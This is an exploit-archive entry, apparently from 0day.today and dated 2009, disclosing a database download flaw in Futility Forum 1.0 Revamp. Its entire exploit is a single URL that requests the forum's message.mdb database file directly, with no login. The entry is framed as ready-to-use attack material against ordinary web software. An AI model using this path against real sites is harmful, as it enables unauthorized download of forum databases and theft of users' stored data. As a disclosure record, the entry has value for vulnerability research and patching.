id: 10496
date: 12/29/2009
title: Futility Forum 1.0 Revamp DB Download Vulnerability
author: indoushka
cves: 

===================================================
Futility Forum 1.0 Revamp DB Download Vulnerability
===================================================

========================================================================================                 
| # Title    : Futility Forum 1.0 Revamp DB Download Vulnerability                     |
| # Author   : indoushka                                                               |
| # Script   : Futility Forum 1.0 Revamp                                               |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1/futility1a/message.mdb



#  0day.today [2023-03-26]  #